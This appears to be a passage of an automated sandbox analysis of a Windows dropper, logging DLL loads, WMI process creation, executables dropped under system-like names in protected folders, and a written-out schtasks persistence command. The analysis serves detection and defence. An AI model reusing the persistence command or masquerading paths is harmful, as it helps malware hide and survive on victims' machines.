          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textshaping.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: textinputframework.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coreuicomponents.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: coremessaging.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: apphelp.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: version.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: wldp.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: profapi.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: amsi.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: userenv.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: wbemcomn.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: propsys.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: dlnashext.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: wpdshext.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: edputil.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: netutils.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: windows.staterepositoryps.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: appresolver.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: bcp47langs.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: slc.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: sppc.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: onecorecommonproxystub.dllJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: kernel.appcore.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: taskschd.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: sspicli.dll
          Source: C:\Windows\System32\schtasks.exeSection loaded: xmllite.dll
          Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{00BB2765-6A77-11D0-A535-00C04FD7D062}\InProcServer32Jump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\Windows Defender Advanced Threat Protection\c5b4cb5e9653ccJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\Windows Sidebar\WmiPrvSE.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\Windows Sidebar\24dbde2999530eJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeDirectory created: C:\Program Files\MSBuild\48b6e448d1d68fJump to behavior
          Source: file.exeStatic file information: File size 2771800 > 1048576
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: file.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
          Source: file.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: file.exe
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdbU.o. a._CorDllMainmscoree.dll source: comProviderServer.exe, 00000007.00000002.1422929652.000000001BD60000.00000004.08000000.00040000.00000000.sdmp
          Source: Binary string: \Desktop\DCLIB-master\obj\Debug\DCLIB.pdb source: comProviderServer.exe, 00000007.00000002.1422929652.000000001BD60000.00000004.08000000.00040000.00000000.sdmp
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: file.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\file.exeFile created: C:\reviewDriverIntosessionnet\__tmp_rar_sfx_access_check_5026703Jump to behavior
          Source: file.exeStatic PE information: section name: .didat
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9E28C push eax; ret 1_2_00B9E2AA
          Source: C:\Users\user\Desktop\file.exeCode function: 1_2_00B9ED46 push ecx; ret 1_2_00B9ED59
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F00BD pushad ; iretd 7_2_00007FFAAC3F00C1
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeCode function: 7_2_00007FFAAC3F7DA4 push edx; retf 7_2_00007FFAAC3F7DA5

          Persistence and Installation Behavior

          barindex
          Creates processes via WMI
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeWMI Queries: IWbemServices::ExecMethod - root\cimv2 : Win32_Process::Create
          Drops PE files with benign system names
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Users\Public\Downloads\explorer.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\reviewDriverIntosessionnet\spoolsv.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Program Files (x86)\Microsoft.NET\RedistList\WmiPrvSE.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Users\jones\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJump to dropped file
          Source: C:\Users\user\Desktop\file.exeFile created: C:\reviewDriverIntosessionnet\comProviderServer.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Program Files\Windows Sidebar\WmiPrvSE.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Program Files (x86)\Windows Media Player\Network Sharing\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Recovery\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Recovery\WmiPrvSE.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Program Files\Windows Defender Advanced Threat Protection\services.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Users\Public\Downloads\explorer.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\reviewDriverIntosessionnet\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Program Files\MSBuild\bdoMPjmZJHMIJMdqEctkzcHPTiy.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Users\user\wscript.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\reviewDriverIntosessionnet\spoolsv.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Users\user\wscript.exeJump to dropped file
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Windows\ELAMBKUP\StartMenuExperienceHost.exeJump to dropped file

          Boot Survival

          barindex
          Drops PE files to the user root directory
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeFile created: C:\Users\user\wscript.exeJump to dropped file
          Uses schtasks.exe or at.exe to add and modify task schedules
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess created: C:\Windows\System32\schtasks.exe schtasks.exe /create /tn "servicess" /sc MINUTE /mo 8 /tr "'C:\Program Files\Windows Defender Advanced Threat Protection\services.exe'" /f
          Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\reviewDriverIntosessionnet\comProviderServer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
